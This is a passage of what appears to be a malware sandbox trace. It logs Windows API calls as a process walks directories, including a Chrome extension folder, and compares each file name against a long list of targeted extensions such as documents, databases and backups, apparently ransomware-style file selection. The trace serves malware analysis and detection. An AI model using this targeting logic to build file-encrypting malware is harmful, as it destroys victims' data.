lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.861] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.861] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0035.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0035.861] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.862] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6d5cd, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb6d5cd, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0035.862] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0035.862] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.862] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad34e79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ad34e79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ad5afda, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0035.862] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.863] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0035.863] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5390a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc5390a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0035.863] FindClose (in: hFindFile=0x3ef1140 | out: hFindFile=0x3ef1140) returned 1 [0035.863] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.863] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0035.863] FindClose (in: hFindFile=0x3ef1100 | out: hFindFile=0x3ef1100) returned 1 [0035.863] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ec0048 | out: hHeap=0x570000) returned 1 [0035.863] FindNextFileW (in: hFindFile=0x3ef1080, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0035.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1100 [0035.864] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.864] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0035.866] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.866] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0036.267] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.274] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0052.794] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.796] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.801] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.803] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.805] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.807] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0052.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 139 [0052.809] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 1 [0052.811] lstrlenW (lpString="id") returned 2 [0052.823] lstrcmpiW (lpString1="C:\\Windows", lpString2="id") returned -1 [0052.823] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x4002500 [0052.825] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 139 [0052.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1580 [0052.825] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.825] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.825] lstrlenW (lpString="messages.json") returned 13 [0052.825] lstrlenW (lpString=".1cd") returned 4 [0052.825] lstrcmpiW (lpString1=".1cd", lpString2="json") returned -1 [0052.825] lstrlenW (lpString=".3ds") returned 4 [0052.825] lstrcmpiW (lpString1=".3ds", lpString2="json") returned -1 [0052.825] lstrlenW (lpString=".3fr") returned 4 [0052.825] lstrcmpiW (lpString1=".3fr", lpString2="json") returned -1 [0052.825] lstrlenW (lpString=".3g2") returned 4 [0052.826] lstrcmpiW (lpString1=".3g2", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".3gp") returned 4 [0052.826] lstrcmpiW (lpString1=".3gp", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".7z") returned 3 [0052.826] lstrcmpiW (lpString1=".7z", lpString2="son") returned -1 [0052.826] lstrlenW (lpString=".accda") returned 6 [0052.826] lstrcmpiW (lpString1=".accda", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".accdb") returned 6 [0052.826] lstrcmpiW (lpString1=".accdb", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".accdc") returned 6 [0052.826] lstrcmpiW (lpString1=".accdc", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".accde") returned 6 [0052.826] lstrcmpiW (lpString1=".accde", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".accdt") returned 6 [0052.826] lstrcmpiW (lpString1=".accdt", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".accdw") returned 6 [0052.826] lstrcmpiW (lpString1=".accdw", lpString2="s.json") returned -1 [0052.826] lstrlenW (lpString=".adb") returned 4 [0052.826] lstrcmpiW (lpString1=".adb", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".adp") returned 4 [0052.826] lstrcmpiW (lpString1=".adp", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai") returned 3 [0052.826] lstrcmpiW (lpString1=".ai", lpString2="son") returned -1 [0052.826] lstrlenW (lpString=".ai3") returned 4 [0052.826] lstrcmpiW (lpString1=".ai3", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai4") returned 4 [0052.826] lstrcmpiW (lpString1=".ai4", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai5") returned 4 [0052.826] lstrcmpiW (lpString1=".ai5", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai6") returned 4 [0052.826] lstrcmpiW (lpString1=".ai6", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai7") returned 4 [0052.826] lstrcmpiW (lpString1=".ai7", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".ai8") returned 4 [0052.826] lstrcmpiW (lpString1=".ai8", lpString2="json") returned -1 [0052.826] lstrlenW (lpString=".anim") returned 5 [0052.826] lstrcmpiW (lpString1=".anim", lpString2=".json") returned -1 [0052.827] lstrlenW (lpString=".arw") returned 4 [0052.827] lstrcmpiW (lpString1=".arw", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".as") returned 3 [0052.827] lstrcmpiW (lpString1=".as", lpString2="son") returned -1 [0052.827] lstrlenW (lpString=".asa") returned 4 [0052.827] lstrcmpiW (lpString1=".asa", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".asc") returned 4 [0052.827] lstrcmpiW (lpString1=".asc", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".ascx") returned 5 [0052.827] lstrcmpiW (lpString1=".ascx", lpString2=".json") returned -1 [0052.827] lstrlenW (lpString=".asm") returned 4 [0052.827] lstrcmpiW (lpString1=".asm", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".asmx") returned 5 [0052.827] lstrcmpiW (lpString1=".asmx", lpString2=".json") returned -1 [0052.827] lstrlenW (lpString=".asp") returned 4 [0052.827] lstrcmpiW (lpString1=".asp", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".aspx") returned 5 [0052.827] lstrcmpiW (lpString1=".aspx", lpString2=".json") returned -1 [0052.827] lstrlenW (lpString=".asr") returned 4 [0052.827] lstrcmpiW (lpString1=".asr", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".asx") returned 4 [0052.827] lstrcmpiW (lpString1=".asx", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".avi") returned 4 [0052.827] lstrcmpiW (lpString1=".avi", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".avs") returned 4 [0052.827] lstrcmpiW (lpString1=".avs", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".backup") returned 7 [0052.827] lstrcmpiW (lpString1=".backup", lpString2="es.json") returned -1 [0052.827] lstrlenW (lpString=".bak") returned 4 [0052.827] lstrcmpiW (lpString1=".bak", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".bay") returned 4 [0052.827] lstrcmpiW (lpString1=".bay", lpString2="json") returned -1 [0052.827] lstrlenW (lpString=".bd") returned 3 [0052.827] lstrcmpiW (lpString1=".bd", lpString2="son") returned -1 [0052.827] lstrlenW (lpString=".bin") returned 4 [0052.828] lstrcmpiW (lpString1=".bin", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".bmp") returned 4 [0052.828] lstrcmpiW (lpString1=".bmp", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".bz2") returned 4 [0052.828] lstrcmpiW (lpString1=".bz2", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".c") returned 2 [0052.828] lstrcmpiW (lpString1=".c", lpString2="on") returned -1 [0052.828] lstrlenW (lpString=".cdr") returned 4 [0052.828] lstrcmpiW (lpString1=".cdr", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cer") returned 4 [0052.828] lstrcmpiW (lpString1=".cer", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cf") returned 3 [0052.828] lstrcmpiW (lpString1=".cf", lpString2="son") returned -1 [0052.828] lstrlenW (lpString=".cfc") returned 4 [0052.828] lstrcmpiW (lpString1=".cfc", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cfm") returned 4 [0052.828] lstrcmpiW (lpString1=".cfm", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cfml") returned 5 [0052.828] lstrcmpiW (lpString1=".cfml", lpString2=".json") returned -1 [0052.828] lstrlenW (lpString=".cfu") returned 4 [0052.828] lstrcmpiW (lpString1=".cfu", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".chm") returned 4 [0052.828] lstrcmpiW (lpString1=".chm", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cin") returned 4 [0052.828] lstrcmpiW (lpString1=".cin", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".class") returned 6 [0052.828] lstrcmpiW (lpString1=".class", lpString2="s.json") returned -1 [0052.828] lstrlenW (lpString=".clx") returned 4 [0052.828] lstrcmpiW (lpString1=".clx", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".config") returned 7 [0052.828] lstrcmpiW (lpString1=".config", lpString2="es.json") returned -1 [0052.828] lstrlenW (lpString=".cpp") returned 4 [0052.828] lstrcmpiW (lpString1=".cpp", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".cr2") returned 4 [0052.828] lstrcmpiW (lpString1=".cr2", lpString2="json") returned -1 [0052.828] lstrlenW (lpString=".crt") returned 4 [0052.829] lstrcmpiW (lpString1=".crt", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".crw") returned 4 [0052.829] lstrcmpiW (lpString1=".crw", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".cs") returned 3 [0052.829] lstrcmpiW (lpString1=".cs", lpString2="son") returned -1 [0052.829] lstrlenW (lpString=".css") returned 4 [0052.829] lstrcmpiW (lpString1=".css", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".csv") returned 4 [0052.829] lstrcmpiW (lpString1=".csv", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".cub") returned 4 [0052.829] lstrcmpiW (lpString1=".cub", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dae") returned 4 [0052.829] lstrcmpiW (lpString1=".dae", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dat") returned 4 [0052.829] lstrcmpiW (lpString1=".dat", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".db") returned 3 [0052.829] lstrcmpiW (lpString1=".db", lpString2="son") returned -1 [0052.829] lstrlenW (lpString=".dbf") returned 4 [0052.829] lstrcmpiW (lpString1=".dbf", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dbx") returned 4 [0052.829] lstrcmpiW (lpString1=".dbx", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dc3") returned 4 [0052.829] lstrcmpiW (lpString1=".dc3", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dcm") returned 4 [0052.829] lstrcmpiW (lpString1=".dcm", lpString2="json") returned -1 [0052.829] lstrlenW (lpString=".dcr") returned 4 [0052.829] lstrcmpiW (lpString1=".dcr", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".der") returned 4 [0052.830] lstrcmpiW (lpString1=".der", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dib") returned 4 [0052.830] lstrcmpiW (lpString1=".dib", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dic") returned 4 [0052.830] lstrcmpiW (lpString1=".dic", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dif") returned 4 [0052.830] lstrcmpiW (lpString1=".dif", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".divx") returned 5 [0052.830] lstrcmpiW (lpString1=".divx", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".djvu") returned 5 [0052.830] lstrcmpiW (lpString1=".djvu", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".dng") returned 4 [0052.830] lstrcmpiW (lpString1=".dng", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".doc") returned 4 [0052.830] lstrcmpiW (lpString1=".doc", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".docm") returned 5 [0052.830] lstrcmpiW (lpString1=".docm", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".docx") returned 5 [0052.830] lstrcmpiW (lpString1=".docx", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".dot") returned 4 [0052.830] lstrcmpiW (lpString1=".dot", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dotm") returned 5 [0052.830] lstrcmpiW (lpString1=".dotm", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".dotx") returned 5 [0052.830] lstrcmpiW (lpString1=".dotx", lpString2=".json") returned -1 [0052.830] lstrlenW (lpString=".dpx") returned 4 [0052.830] lstrcmpiW (lpString1=".dpx", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dqy") returned 4 [0052.830] lstrcmpiW (lpString1=".dqy", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dsn") returned 4 [0052.830] lstrcmpiW (lpString1=".dsn", lpString2="json") returned -1 [0052.830] lstrlenW (lpString=".dt") returned 3 [0052.830] lstrcmpiW (lpString1=".dt", lpString2="son") returned -1 [0052.830] lstrlenW (lpString=".dtd") returned 4 [0052.830] lstrcmpiW (lpString1=".dtd", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".dwg") returned 4 [0052.831] lstrcmpiW (lpString1=".dwg", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".dwt") returned 4 [0052.831] lstrcmpiW (lpString1=".dwt", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".dx") returned 3 [0052.831] lstrcmpiW (lpString1=".dx", lpString2="son") returned -1 [0052.831] lstrlenW (lpString=".dxf") returned 4 [0052.831] lstrcmpiW (lpString1=".dxf", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".edml") returned 5 [0052.831] lstrcmpiW (lpString1=".edml", lpString2=".json") returned -1 [0052.831] lstrlenW (lpString=".efd") returned 4 [0052.831] lstrcmpiW (lpString1=".efd", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".elf") returned 4 [0052.831] lstrcmpiW (lpString1=".elf", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".emf") returned 4 [0052.831] lstrcmpiW (lpString1=".emf", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".emz") returned 4 [0052.831] lstrcmpiW 